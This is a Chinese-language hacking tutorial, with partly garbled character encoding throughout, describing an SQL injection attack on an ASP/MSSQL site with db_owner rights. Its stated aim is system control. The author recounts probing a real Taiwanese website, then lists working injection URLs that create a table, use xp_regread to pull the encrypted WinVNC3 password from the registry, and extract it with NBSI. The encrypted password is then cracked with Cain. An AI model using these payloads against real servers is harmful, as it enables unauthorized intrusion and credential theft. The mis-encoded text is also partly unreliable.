MSSQLdb_owner角色注入直接獲得系統(tǒng)權(quán)限

字號(hào):

相信大家對(duì)ASP+MSSQL注入都已經(jīng)很熟悉了,連一個(gè)對(duì)SQL語法絲毫不懂的人也可以用NBSI來輕松入侵大量網(wǎng)站。但就算是一個(gè)SQL INJECTION高手,如果針對(duì)在MSSQL中只有db_owner角色,破不出猜不到網(wǎng)站后臺(tái)的情況下,好像也無技可施;除了用備份得到shell的這個(gè)思路,我在網(wǎng)上實(shí)在沒有找出更好的入侵辦法。不過,備份得到的shell只是理論化的東東,如果一個(gè)webshell有20mb的話,你還能用它嗎?前不久,我就碰到了這樣的一個(gè)臺(tái)灣網(wǎng)站,管理員的密碼倒是用NBSi跑了出來,可是用戶名因?yàn)槭欠斌w的原因在NBSi中成了一堆亂碼。我也找到了后臺(tái),可只有干瞪眼的份。怎么辦?我又掃了它的所有端口,發(fā)現(xiàn)開了5900,估計(jì)是管理員用了VNC對(duì)服務(wù)器進(jìn)行了遠(yuǎn)程控制。這時(shí),我就有一個(gè)思路,能不能把VNC在注冊(cè)表的加密密碼讀出來再來*呢?看我表演吧!
    TELNET服務(wù)器的5900端口,得到訊息如圖1所示,證實(shí)服務(wù)器的確用的是VNC。相信大家都會(huì)用讀xp_regread來讀注冊(cè)表了,依次提交如下語句:
    http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][char](255));
    這樣我們就成功地建了一個(gè)名為cyfd的表,并且添加了類型是char,長度為255的字段名gyfd。然后向表中加數(shù)據(jù):
    _blank>http://www.something.com/script.asp?id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
    從注冊(cè)表中讀出VNC在注冊(cè)表的加密密碼的值,再把值插入到剛建的表中。然后暴出VNC在注冊(cè)表的加密密碼:
    _blank>http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd where gyfd > 1)。
    可是結(jié)果大失我所望,gyfd的值是空的。如果這樣容易的話,不會(huì)有這篇文章出現(xiàn)了。這是什么原因呢?我的語法不正確?翻來覆去的檢查我的語句也沒有發(fā)現(xiàn)錯(cuò)誤呀。難道繁體的vnc在注冊(cè)表里的位置不一樣?后來我又開始在本機(jī)裝了vnc又在分析查循器里做測試,得到的結(jié)果卻是個(gè)數(shù)字5。這時(shí)czy上線了,詢問了一下,他勸我把gyfd的這個(gè)字段改成二進(jìn)制數(shù)據(jù)類型 binary來試一下。于是我又在本機(jī)測試了一下,依次提交如下語句:
    http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][binary](20));
    http://127.0.0.1/script.asp?id=2;DECLARE @result binary(20) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
    然后我再用nbsi跑出cyfd表里gyfd這個(gè)字段的值。結(jié)果到是出來了,得到了vnc的加密密碼值是0x0E3515AC00000000000000000000000000000000??蛇@兒還不對(duì),我在本機(jī)裝的vnc在注冊(cè)表里的密碼值是hex:0e,35,15,ac,00,62,d3,08這個(gè)呀。原來binary(n)的數(shù)據(jù)存儲(chǔ)長度是固定的,當(dāng)輸入的二進(jìn)制長度小于n時(shí),余下長度填0補(bǔ)充。我在注入語句中寫入的binary(20)是足夠?qū)懭雟nc加密密碼的長度時(shí),為什么還有那么多0來填充呢?這是因?yàn)檎梦业膙nc密碼是0e3515ac0062d308,在碰到了00的情況下,xp_regread以為已經(jīng)讀完了它的值呢,把00當(dāng)成了結(jié)束符,所以只讀到了0x0E3515AC,我暈!
    翻了一下書,終于讓我找到了一個(gè)特殊的數(shù)據(jù)類型uniqueidentifier,是用來存儲(chǔ)一個(gè)16字節(jié)長的二進(jìn)制數(shù)據(jù)類型。把注入語句改造一下:
    http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][uniqueidentifier]);
    http://127.0.0.1/script.asp?id=2;DECLARE @result uniqueidentifier EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
    然后再用nbsi跑一下,跑出來了,不過得到的結(jié)果是AC15350E-6200-08D3-0000-000000000000。
    AC15350E-6200-08D3-0000-000000000000和我在注冊(cè)表里的正確的vnc密碼的值0e3515ac0062d308相比,能看出來有什么不同嗎?只不過順序是顛倒的,相信大家都會(huì)小學(xué)的算術(shù),這個(gè)不用我教了。試一下用cain破出vnc的密碼,看看行不行
    看樣子在本機(jī)做的測試一切成功。這方法用到臺(tái)灣上的站點(diǎn)試試,哎,依然沒有跑出vnc的密碼,也許繁體vnc在注冊(cè)表的位置不同吧。不過,我研究了一上午,有了一點(diǎn)收獲,就放過你吧??荚嚧缶庉嬚?BR>